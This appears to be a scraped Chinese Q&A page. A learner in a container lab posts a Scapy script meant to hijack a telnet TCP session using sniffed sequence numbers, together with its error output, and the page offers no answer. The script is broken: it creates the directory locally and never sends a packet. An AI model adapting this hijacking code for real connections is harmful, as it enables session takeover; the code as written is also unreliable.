问题描述
我打开了三个终端,并登录到客户端,服务器和攻击者容器。 从这里,我从客户端到服务器建立了telnet连接。 我使用wireshark找到了最新的TCP连接,并找到了下一个序列号和确认号。 使用这些代码,我编写了以下代码以在攻击者终端上运行,以劫持会话并在服务器上创建目录:
#!/usr/bin/python3
import sys
from scapy.all import *
import os
print("SENDING SESSION HIJACKING PACKET.........")
IPLayer = IP(src="10.4.0.2",dst="10.4.1.15")
TCPLayer = TCP(sport=46716,dport=23,flags="A",seq=2718986968,ack=1930649433)
directory = "Test"
os.mkdir(directory)
send(verbose=0)
这将返回以下错误:
root@attacker:~# python3 tcphijack.py
SENDING SESSION HIJACKING PACKET.........
Traceback (most recent call last):
File "tcphijack.py",line 12,in <module>
os.mkdir(directory)
FileExistsError: [Errno 17] File exists: 'Test'
root@attacker:~#
但是,当我运行以下代码时,我从服务器获得以下响应:
root@server:~# ls
mitm_dns.py sniff_dns.py spoof_dns.py
这些文件来自我正在练习的另一种攻击,但是未显示目录,但攻击者终端声称该目录已经存在。
任何帮助将不胜感激。
解决方法
暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!
如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。
小编邮箱:dio#foxmail.com (将#修改为@)